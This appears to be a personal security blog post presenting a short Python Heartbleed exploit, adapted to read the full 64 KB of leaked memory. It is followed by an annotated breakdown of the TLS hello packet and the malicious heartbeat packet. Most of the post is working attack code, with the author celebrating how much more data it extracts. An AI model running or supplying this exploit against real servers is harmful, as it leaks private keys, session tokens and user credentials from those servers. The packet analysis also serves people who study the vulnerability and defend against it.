Cugu's blog

IT security & forensics

RSSTwitterGithub

Heartbleed exploit

Heartbleed exploits are spread all over the web. Lots of them are written in python. A simple one just uses seven lines of code. This code and works quite well. The drawback: you just get 8kb of data. Heartbleed offers 64k!

The socket.recv() limits the number of bytes, that can be received. So lets replace it with the recv_all function from zamaros github. Voilá:

    import socket, select

    # receive multiple packets
    def recv_all(sock, length):
        response = ''
        bytes_left = length
        while bytes_left > 0:
            r, w, e = select.select([sock], [], [], 5)
            if sock in r:
                data = sock.recv(bytes_left)
                response += data
                bytes_left -= len(data)
        return response

    # create socket
    sh = socket.socket()
    # open socket to server
    sh.connect((\"server.com\", 1337))
    # send hello packet
    sh.send(\"16030200310100002d0302500bafbbb75ab83ef0ab9ae3f39c6315334137acfd6c181a2460dc4967c2fd960000040033c01101000000\".decode('hex'))
    # recive and ignore answer
    helloresponse = sh.recv(8196)
    # send bad heartbleed packet
    sh.send(\"180302000401FFFF2F\".decode('hex'))
    # show answer
    print recv_all(sh, 65535)

The script is still simple and you get more data! Awesome!

packet

The packets structure of the hello packet and the heartbeat packet is as follows:

hello packet

16 03 02 00 31      # TLS Header
01 00 00 2d         # Handshake header
03 02               # ClientHello field: version number (TLS 1.1)
50 0b af bb b7 5a b8 3e f0 ab 9a e3 f3 9c 63 15 \\
33 41 37 ac fd 6c 18 1a 24 60 dc 49 67 c2 fd 96 # ClientHello field: random
00                  # ClientHello field: session id
00 04               # ClientHello field: cipher suite length
00 33 c0 11         # ClientHello field: cipher suite(s)
01                  # ClientHello field: compression support, length
00                  # ClientHello field: compression support, no compression (0)
00 00               # ClientHello field: extension length (0)

malicious heartbeat packet

18          # type              (Heartbeat)
03 02       # tls_revision      (TLS1.1)
00 04       # payload_length    (4)
01          # type              (Request)
FF FF       # claimed_length    (65535)
2F          # payload           (0x2f, random)